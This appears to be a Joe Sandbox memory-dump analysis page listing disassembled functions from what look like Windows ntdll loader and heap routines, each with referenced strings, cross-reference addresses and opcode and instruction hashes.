Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 2af63dcc2175e181eee29f96461f02c83d5529457be2822334d515cdd0ed243b
Instruction ID: d936ae089586a22919e03d13cc74bfb0eb6a6b358e5cd6f1cc0e39f4b35b5550
Opcode Fuzzy Hash: 2af63dcc2175e181eee29f96461f02c83d5529457be2822334d515cdd0ed243b
Instruction Fuzzy Hash: C7E2CF74A08315DFEB18CF68D490BA9BBF1FF48304F548199D849AB385DB76A842CF90

Function 354EB6C0 Relevance: 5.3, Strings: 4, Instructions: 303COMMON

Download Yara Rule

Strings

LdrResGetRCConfig Exit, xrefs: 354EB714
\UK5, xrefs: 354EB7E4, 354EB7E7
LdrResGetRCConfig Enter, xrefs: 354EB702
MUI, xrefs: 354EB6D8

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI$\UK5
API String ID: 0-2422749751
Opcode ID: a8a358cfe8aa260aa92ada183c91fdfc380ab3d718352b4037b3d467e9d486df
Instruction ID: 706abd9c15b6d4e0f5b9e67b1d9f24478ba62b9ed51c9b71d40cfb4fe1beeeb3
Opcode Fuzzy Hash: a8a358cfe8aa260aa92ada183c91fdfc380ab3d718352b4037b3d467e9d486df
Instruction Fuzzy Hash: C8B1EDB6A0A7448FEB19CF68C980F9DB7B6BF94350F554529E851EB7A0D730E880CB40

Function 35518402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 3551855E
minkernel\ntdll\ldrinit.c, xrefs: 35518421
@, xrefs: 35518591
LdrpInitializeProcess, xrefs: 35518422

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: faff8aef5f70426fff814b32660d0aba01f766135832b05f8102199970b3d1e8
Instruction ID: c38981fe72299d52fb25408ef25b204c32e92f1a449d474b6f42961128f984ad
Opcode Fuzzy Hash: faff8aef5f70426fff814b32660d0aba01f766135832b05f8102199970b3d1e8
Instruction Fuzzy Hash: 85918D75608344AFEB21DF60CC50E6BBAE8FB84794F80092EF98592150E774EA44CB62

Function 354F0C00 Relevance: 5.3, Strings: 4, Instructions: 260COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 355454E0, 355455A1
((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 355454ED
HEAP[%wZ]: , xrefs: 355454D1, 35545592
ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 355455AE

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
API String ID: 0-1657114761
Opcode ID: f93eca02143efcfd8f91b5ee6b6dc0840b213d4ad95af520edeb567a6e55d6d3
Instruction ID: 9ea7eb161b362b8b4bc50438e1ce73f37c19bb055f87a288f27a80cbc8b6ad4c
Opcode Fuzzy Hash: f93eca02143efcfd8f91b5ee6b6dc0840b213d4ad95af520edeb567a6e55d6d3
Instruction Fuzzy Hash: 92A1C078A047859FE71CCF28C850BAAB7F1BF84304F5485ADD48A8B781DB75B845CB91

Function 3551273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 355521D9, 355522B1
SXS: %s() passed the empty activation context, xrefs: 355521DE
.Local, xrefs: 355128D8
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 355522B6

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: 08f0a4a7f75e11f5773633232d46567038c36ab3449023beb4713a243109d7ec
Instruction ID: d8408078d7c8e336f4a17919854a36ae4762ef7f8c71ed67722a07b2f8231c68
Opcode Fuzzy Hash: 08f0a4a7f75e11f5773633232d46567038c36ab3449023beb4713a243109d7ec
Instruction Fuzzy Hash: 1EA1B1799043299FEF24CF59C884B99B7B1BF58354F9145EAD80AA7250D770AEC0CF90

Function 354EB440 Relevance: 5.2, Strings: 4, Instructions: 221COMMON

Download Yara Rule

Strings

LdrpResGetResourceDirectory Enter, xrefs: 354EB465
\UK5, xrefs: 354EB5E0
LdrpResGetResourceDirectory Exit, xrefs: 354EB477
{, xrefs: 355437B6

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit$\UK5${
API String ID: 0-1224056999
Opcode ID: ec710d448d10f15546df0ea047bd9420ec80ea89cfe75c8b65cb4ff26c987cba
Instruction ID: b9d025d5759c31c33f8724a79d4c1a4727eba89abf6b4df16ff72218a3c9fea8
Opcode Fuzzy Hash: ec710d448d10f15546df0ea047bd9420ec80ea89cfe75c8b65cb4ff26c987cba
Instruction Fuzzy Hash: D59104B5A06309CFEB19CF64C840BDE77B0FF11365F514195E851AB3A0D7B8AA81CB91

Function 354E64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 35541028
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 3554106B
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 355410AE
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 35540FE5

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: 6acb7141e1678944a2a5edb8e046a872b213032c30e3ccf0d35dae616c70c407
Instruction ID: f1219142dfc8c2c97a2d29f5377127f534eaaaf5132a3939d3d5495ea5b6c510
Opcode Fuzzy Hash: 6acb7141e1678944a2a5edb8e046a872b213032c30e3ccf0d35dae616c70c407
Instruction Fuzzy Hash: 0B71B1B5A04344AFD710CF54D885F8B7BB9AF847A4F900468F9488B296D734E58ACFD2

Function 354DF626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 3553E54E
`, xrefs: 3553E428
HEAP[%wZ]: , xrefs: 3553E3FE
ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3553E563

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
API String ID: 0-2586055223
Opcode ID: 13e3dec25afa64724a222ce8cc42886f52329f88d6e15f63d4aebae7564b9920
Instruction ID: 78f4ab7c7533d0b1044f5db9d0a0e0b023a57bfa03b91e66244cabb21ee56962
Opcode Fuzzy Hash: 13e3dec25afa64724a222ce8cc42886f52329f88d6e15f63d4aebae7564b9920
Instruction Fuzzy Hash: B9613676245780AFE316CB28C865F5BB7F9FF84750F040468F9598B292D774E902CB61

Function 354D9148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

VirtualQuery Failed 0x%p %x, xrefs: 3553BAF7
HEAP: , xrefs: 3553BAAD, 3553BAEA
VirtualProtect Failed 0x%p %x, xrefs: 3553BABA
HEAP[%wZ]: , xrefs: 3553BAA0, 3553BADD

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
API String ID: 0-1391187441
Opcode ID: 0c52a74bad31ed7dd47a6df2217f9bd351bf817127240aaabe008dde0cf5932e
Instruction ID: a0ecf9823b24330df6438de05790a537bc10e41a255e5abf49ffa662209deebf
Opcode Fuzzy Hash: 0c52a74bad31ed7dd47a6df2217f9bd351bf817127240aaabe008dde0cf5932e
Instruction Fuzzy Hash: ED31AE36601644EFDB09CB45C895F9EF7F9EF45670F154095E818AB292EB70E940CE60

Function 354E7152 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 355417D9
RtlDebugPrintTimes.NTDLL ref: 355417EE

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: cb5b2836ab6fd7c9a98237a6ad94e0e9b61273fb91758128bf45d819c8314f02
Instruction ID: f7ce5f233293d3869defa73e556dee045dcb508fe9551abcd5ee05c79fe1a8d1
Opcode Fuzzy Hash: cb5b2836ab6fd7c9a98237a6ad94e0e9b61273fb91758128bf45d819c8314f02
Instruction Fuzzy Hash: 3951D375A04746EFEB09CF65CA44BAEFBB5FF44366F104169E51293390DBB4A902CB80

Function 355A7571 Relevance: 4.7, APIs: 3, Instructions: 153timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 355A764E
RtlDebugPrintTimes.NTDLL ref: 355A76A0
RtlDebugPrintTimes.NTDLL ref: 355A76F5

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 4949fd69a17b38cbe2759270d6abb2807d9330415cd2b443ec2830f8a11294cf
Instruction ID: 102289f5665b4fbee3c1bf44cfcdabc9003adabfb666b7f513b06c1dc71aee81
Opcode Fuzzy Hash: 4949fd69a17b38cbe2759270d6abb2807d9330415cd2b443ec2830f8a11294cf
Instruction Fuzzy Hash: 2651B173E202199BDB06CB68D844B6EBBF9FF88255F404569E901E7250DB70B952CBD0

Function 355B03E6 Relevance: 4.6, APIs: 3, Instructions: 86timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 355B0426
RtlDebugPrintTimes.NTDLL ref: 355B046A
RtlDebugPrintTimes.NTDLL ref: 355B04BC

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 1a5ffc071229b979d0784347516a2783c2311c595da2840f22579f134e77e7ae
Instruction ID: 8baea6c3217d55c5c480cd0ed882280d737b2fef2248e4c715169168eb127f0c
Opcode Fuzzy Hash: 1a5ffc071229b979d0784347516a2783c2311c595da2840f22579f134e77e7ae
Instruction Fuzzy Hash: 4C316172B04219AFDF04CBA4D898A9FBBB9FB88254F414129E905E3250DB707D05CBA0

Function 354F1F92 Relevance: 4.3, Strings: 3, Instructions: 563COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 354F212E, 35545E53, 35546001, 3554614B
HEAP[%wZ]: , xrefs: 354F2155, 35545E46, 35545FF4, 3554613E
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 354F216B, 35545E68, 35546016, 35546160

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 3c557d23ae8d893a7b7182ab4b82fb4645f07d4317a322e4cb5f491c0a3eec92
Instruction ID: 8d12915058d3e2058fe10bff9a042b8026f4434ddd73c699db5355cc309163c5
Opcode Fuzzy Hash: 3c557d23ae8d893a7b7182ab4b82fb4645f07d4317a322e4cb5f491c0a3eec92
Instruction Fuzzy Hash: 8322E3B46047459FEB19CF28C850B6AFBF5FF45704F148499E54A8B342DB75E842CB90

Function 354E1460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 354E1596
HEAP[%wZ]: , xrefs: 354E1712
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 354E1728

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: c1e92970cb5fe48ad9cac2f1d8628dc0b51ea238bfe79edc957eb5b82174cc2a
Instruction ID: 71640736ab98cdb2723bf690f01622b2a40dbbc52196ac6a0d45081702cb5a27
Opcode Fuzzy Hash: c1e92970cb5fe48ad9cac2f1d8628dc0b51ea238bfe79edc957eb5b82174cc2a
Instruction Fuzzy Hash: A0E1DE74A047819BEB19CF28C491BAAFBF1BF49301F14949EE496CB345DB74E842CB50

Function 3556368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON

Download Yara Rule

Strings

@, xrefs: 3556389F
DelegatedNtdll, xrefs: 355636CE
\SystemRoot\system32\, xrefs: 35563842

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: @$DelegatedNtdll$\SystemRoot\system32\
API String ID: 0-2391371766
Opcode ID: affff0530a230dbe5a090b3c988ade59201bc902fa0ca00cd6aa54bd37a84d70
Instruction ID: 6b5735c4b28c2c2f46e95fbc5d6d6aee6299315ce40ab53d4154b7fa75801585
Opcode Fuzzy Hash: affff0530a230dbe5a090b3c988ade59201bc902fa0ca00cd6aa54bd37a84d70
Instruction Fuzzy Hash: 4FB1B2B6609385AFE311DF54C880F5BB7F8BB54758F42592AF940AB290DB70F805CB92

Function 35506962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

, xrefs: 3554CA51
@, xrefs: 35506C24

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: $@
API String ID: 0-1077428164
Opcode ID: ec3e2ccec75085b1258708a527b154d55a94f0a7de9131dcd060fdece80f3f05
Instruction ID: a6fb5c4e82b0b2040e2bc7bf295b09c9a353731c1ff7237ca729d37e2e66d834
Opcode Fuzzy Hash: ec3e2ccec75085b1258708a527b154d55a94f0a7de9131dcd060fdece80f3f05
Instruction Fuzzy Hash: 12C26AB5A193419FE725CF24C880B9BBBE5BFC8754F44892DE98987240DB74E805CF92

Function 354DA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

\??\, xrefs: 3553C1E4
FilterFullPath, xrefs: 3553C2E6
UseFilter, xrefs: 354DA1C1

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: b83d37f251a0b773c0bc15af166a7dc95abcdb549ff7e492778210e1a74b26ae
Instruction ID: 36f8fea8acffa059d035d4961b0d77808f01a0239fa5db7ab58bfa8976357b9a
Opcode Fuzzy Hash: b83d37f251a0b773c0bc15af166a7dc95abcdb549ff7e492778210e1a74b26ae
Instruction Fuzzy Hash: 0DA19A76A012299BDB21CF64CC89BEAB7B8FF44710F5001EAE90DA7250D735AE85CF50

Function 355736EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON

Download Yara Rule

Strings

LdrpResMapFile Enter, xrefs: 35573715
LdrpResMapFile Exit, xrefs: 35573727
@, xrefs: 35573867

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
API String ID: 0-318774311
Opcode ID: 60650a3ebc8955dc510c4dd2fd6c460a02e250c4af5d6b2748e90673d1970acd
Instruction ID: f4e4540a7dd73013059af6d6a40da291c81dc554f4acc7df75c97f4109772749
Opcode Fuzzy Hash: 60650a3ebc8955dc510c4dd2fd6c460a02e250c4af5d6b2748e90673d1970acd
Instruction Fuzzy Hash: 63818BB5609341AFE311CF14C880B6AB7E8FF95760F41096DF9919B390EB75E904CBA2

Function 3551909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON

Download Yara Rule

Strings

&, xrefs: 35555CF8
%, xrefs: 35555D3F
@, xrefs: 35519148

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: %$&$@
API String ID: 0-1537733988
Opcode ID: dd63b62915590bcfeafdf5ed254c412bf70c9f5dafd8ad347b730b3e4edbf842
Instruction ID: 13386234cc60de9362bf75775fbebe2db7cc3bf01e56ef13adbcb855a19d2a26
Opcode Fuzzy Hash: dd63b62915590bcfeafdf5ed254c412bf70c9f5dafd8ad347b730b3e4edbf842
Instruction Fuzzy Hash: 26719A746093419FEB04CF60C580A4BBBF6BFC4758F50491EE8AB4B290CB71BA45CB92

Function 355BB73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON

Download Yara Rule

Strings

\Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 355BB82A
GlobalizationUserSettings, xrefs: 355BB834
TargetNtPath, xrefs: 355BB82F

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
API String ID: 0-505981995
Opcode ID: cc27ca5bd3af775fa873990ee121496c88f2c13d0222cea40ead7b110b45c4de
Instruction ID: d3b4631500368bf8bdac2b1f2c2326bb4d5e1cd7f9df2cc3df6659b5182190ef
Opcode Fuzzy Hash: cc27ca5bd3af775fa873990ee121496c88f2c13d0222cea40ead7b110b45c4de
Instruction Fuzzy Hash: D8617172D01229ABDF25DF54DC88BDAB7B8FF14764F4101E9A508A7250DBB4AE84CF90

Function 354DF7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 3553E6B3
HEAP[%wZ]: , xrefs: 3553E6A6
RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3553E6C6

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
API String ID: 0-1340214556
Opcode ID: cc5cd5b7fa577d22a989375ac9de76039ee61f716d031f522c16809e64ae43d2
Instruction ID: 11e7f162ee79aa7c4175c44267768f7857d6636082c260bb07cc283300ccc351
Opcode Fuzzy Hash: cc5cd5b7fa577d22a989375ac9de76039ee61f716d031f522c16809e64ae43d2
Instruction Fuzzy Hash: AA510275605784EFE71ACBA8C8A5F9AFBF8FF05340F0000A4E5858B692D774E941CB61

Function 355015F4 Relevance: 3.9, Strings: 3, Instructions: 166COMMON

Download Yara Rule

Strings

Could not validate the crypto signature for DLL %wZ, xrefs: 3554A589
